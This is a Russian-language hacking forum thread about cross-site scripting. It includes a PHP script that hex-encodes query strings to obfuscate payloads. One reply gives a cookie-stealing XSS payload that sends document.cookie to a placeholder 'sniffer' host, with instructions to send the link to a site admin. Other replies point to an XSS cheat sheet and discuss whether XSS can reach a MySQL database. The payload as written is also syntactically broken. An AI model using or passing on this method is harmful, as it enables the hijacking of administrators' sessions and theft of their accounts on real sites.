вот скрипт:
<?
$str = urldecode($_SERVER['QUERY_STRING']);
for($i=0;$i<strlen($str);$i++) {
$hex=dechex(ord($str[$i]));
if($str[$i]=='&')
echo "$str[$i]";
else
echo "%$hex";
}
?>
а насчёт твоего вопроса про xss.
что ты там пишешь? что тебя просекло?
ты не то пишешь, тебе надо вставить место твоего(<script>SHOW DATABASES;</script>)непонятно кода, ссылку на снифер, примерно так: <script src="http://tvoi_snifer?"+document.cookie;></script> где "http://tvoi_snifer"-адрес снифера, куда придут куки.
ну и дать ету ссылку админу, как он пройдёт по этой ссылке, к тебе на снифер придут куки.

Что это такое (<script>SHOW DATABASES;</script>), в первые вижу такой запрос к базе, тебе надо прочитать синтаксисы в MySQL, или Sql-injection,статью, иши на форум их полно тута.

Вот такой общий вопрос, могу ли я через XSS как нить попасть в MySQL? Если да, то как? я даже не знаю имени базы

Нет не можешь ни как...!
Не считая получить shell найти пароль от sql

если не допёрло что делать из второго поста, иди сюда -> http://ha.ckers.org/xss.html, прокручивай в самый низ, ну а дальше и так всё ясно...

Вы тут только не нервничайте =) Просто есть сайт (в локале) на котором есть дыра XSS. На сайте нет никакой страницы входа, она просто выводит данные из MySQL. Права на все папки выставлены. Есть способ пробраться в MySQL?

10000000 раз повторяем: XSS - дает возможность навредить ИСКЛЮЧИТЕЛЬНО браузеру жертвы. У тебя есть жертва, у которой нужно украсть куки, редиректнуть ее на другую страницу, и т д?